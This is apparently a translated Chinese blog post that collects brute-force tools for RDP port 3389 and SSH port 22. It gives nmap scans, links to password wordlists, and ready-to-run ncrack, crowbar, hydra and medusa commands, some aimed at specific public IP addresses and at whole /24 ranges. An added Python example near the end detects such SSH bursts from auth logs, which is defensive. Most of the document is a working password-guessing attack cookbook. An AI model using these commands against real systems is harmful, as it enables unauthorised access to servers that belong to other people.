Collection of brute-force tools for port 3389 / port 22 - 泓源视野

Scan: nmap -sT -p22 192.168.1.1/24 -o ip22.txt
Password lists
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt (100 passwords)
https://github.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt (1 million passwords)
Kali ships with the 50 MB rockyou.txt wordlist
wget https://github.com/mishrasunny174/WordLists/raw/master/rockyou.tar.gz

Tools
Wordlist based bruteforce
1. apt-get install ncrack
NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> :3389

ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389

2. apt-get install crowbar
or: # git clone https://github.com/galkan/crowbar

cd crowbar/

pip3 install -r requirements.txt

./crowbar.py --server 116.90.87.230/32 -b rdp -u administrator -C /usr/share/nmap/nselib/data/passwords.lst  # against a single specified IP
Note: rockyou.txt cannot be used here; UTF-8 format wordlists are not supported, only .lst wordlists.
Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s /32 -v
./crowbar.py -b rdp -u user -C password_wordlist -S iplist3389.txt -v
This brute-forces the entire iplist3389 list; note that each IP must be in ip/32 format.
crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/24 -v
The command above targets a whole network segment.
./crowbar.py --server 116.90.87.241/32 -b rdp -u administrator -C /usr/share/nmap/nselib/data/passwords.lst
Recommended
3. hydra: apt-get install hydra

hydra 123.57.173.87 rdp -L users.txt -P pass.txt -V
Batch brute-force command
hydra -M target.txt rdp -L userlist.txt -P passwordlist.txt -V

nmap -sT -p 3389 --open 192.90.81.0/24 -oG - | awk '$4=="Ports:"{print $2}' > ip3389_82.txt
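Saves the IPs of all servers with port 80 open to output.txt
Use a shell script to batch-process the IPs of a C-class (/24) range; mind the file format (dos2unix)
Run the code again: nmap -sT -p 3389 --open 192.90.81.0/24 -oG - | awk '$4=="Ports:"{print $2}' >> ip3389_83.txt
This uses >> to append to ip3389_83.txt
Saving batch results to save.log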
hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 -vV -e ns -o save.log 178.62.118.98 rdp
4. medusa
medusa -M ssh -h 192.168.157.131 -u root -P passwd.txt
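
Seen from the defended host, the hydra and medusa SSH runs above show up as a burst of sshd "Failed password" entries from one source address. The following is an added example, not part of the original post: it scans auth-log lines for such bursts. The log lines, addresses (documentation ranges), threshold, window and the name find_bruteforce are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH "Failed password" entry in classic syslog format (timestamp has no year).
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {source_ip: peak failure count inside any `window`} for every
    source that reaches `threshold` failed logins within the window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window: # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

# Constructed sample log: one source failing every 3 s, one user mistyping twice.
SAMPLE = [
    f"Mar  3 10:15:{s:02d} host1 sshd[{4100 + s}]: Failed password for root "
    f"from 203.0.113.7 port {40000 + s} ssh2"
    for s in range(0, 24, 3)      # 8 failures in 21 s from a single address
] + [
    "Mar  3 10:16:02 host1 sshd[4200]: Failed password for invalid user bob "
    "from 198.51.100.20 port 51515 ssh2",
    "Mar  3 10:19:40 host1 sshd[4201]: Failed password for alice "
    "from 198.51.100.20 port 51600 ssh2",
    "Mar  3 10:19:55 host1 sshd[4202]: Accepted password for alice "
    "from 198.51.100.20 port 51601 ssh2",
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE))
```

Because the window slides per source, a run throttled to one task (hydra's -t 1) is still caught as long as its attempts stay denser than threshold per window.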

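This article was published on 泓源视野 by author admin; all rights belong to 泓源视野. The content is the author's personal opinion and does not mean that 泓源视野 agrees with or endorses it. If you repost it, please credit the source.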